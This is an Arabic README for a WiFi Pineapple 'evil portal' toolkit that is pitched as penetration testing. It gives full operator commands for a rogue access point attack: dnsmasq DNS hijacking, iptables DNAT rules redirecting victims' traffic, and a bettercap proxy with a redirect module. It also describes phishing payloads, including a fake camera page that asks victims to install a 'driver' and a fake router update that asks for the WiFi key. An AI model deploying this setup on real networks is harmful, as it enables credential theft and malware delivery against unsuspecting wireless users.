
مجموعة أدوات نقطة وصول مارقة لاختبار اختراق WiFi، لنشر حمولات تصيد بوابة خبيثة لالتقاط بيانات الاعتماد وتنفيذ هجمات الهندسة الاجتماعية على الشبكات اللاسلكية.
المؤلف:: TW-D
الإصدار:: 1.0.0
حقوق النشر:: Copyright (c) 2024 TW-D
الترخيص:: يوزع تحت نفس شروط Ruby
المتطلبات:: PHP >= 8.1, Ruby >= 2.7.0p0 و WiFi Pineapple Mark VII 2.1.3-stable
التثبيت (توزيعات لينكس المبنية على دبيان)::
sudo apt-get install php8.1-cli php8.1-curl
sudo apt-get install build-essential ruby ruby-dev libpcap-dev
sudo gem install sorted_set bettercap
البوابة الخبيثة هي تقنية تُستخدم لخداع مستخدمي شبكة WiFi من خلال إعادة توجيههم إلى صفحة ويب ضارة بدلاً من صفحة المصادقة أو الصفحة الرئيسية المتوقعة.
ملاحظة : "المشكلات" و"طلبات السحب" مرحب بها.
| نظام التشغيل مع/بدون متصفح ويب | نوع الإشعار |
|---|---|
| Ubuntu 22.04 | لا شيء |
| Android 8.0.0 | النظام |
| Microsoft Windows 10 | لا شيء |
| Raspberry Pi bookworm | لا شيء |
| Ubuntu 22.04 مع Mozilla Firefox | تنبيه |
| Microsoft Windows 10 مع Mozilla Firefox | تنبيه |
| Raspberry Pi bookworm مع Mozilla Firefox | تنبيه |
قم بتوصيل WiFi Pineapple بجهاز الكمبيوتر الخاص بك عبر كابل USB-C.
الإعدادات > الشبكات > وضع العميل اللاسلكي: يجب فصل واجهة wlan2.
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
inet 172.16.42.100 netmask 255.255.255.0 broadcast 172.16.42.255
[...]
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp closed mdns
53/udp open domain
5353/udp closed zeroconf
[...]
hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp open mdns
53/udp open domain
5353/udp open zeroconf
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate
hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading
hacker@hacker-computer:~$ exit
في مجلد "./payloads/"، ستجد:
| التطوير | المؤلف | الوصف | كيفية الاستخدام |
|---|---|---|---|
| skeleton.html | TW-D | حمولة فارغة مخصصة للتطوير. | التوثيق |
| التنفيذ | المؤلف | الوصف | كيفية الاستخدام |
|---|---|---|---|
| web-camera.html | TW-D | تحاكي فيديو مراقبة مزيف وتطلب تثبيت برنامج تشغيل لتشغيله. | التوثيق |

| التصيد | المؤلف | الوصف | كيفية الاستخدام |
|---|---|---|---|
| wifi_security-key.html | TW-D | تحاكي تحديثًا مزيفًا لمعدات الإنترنت وتطلب مفتاح أمان WiFi للمتابعة. | التوثيق |
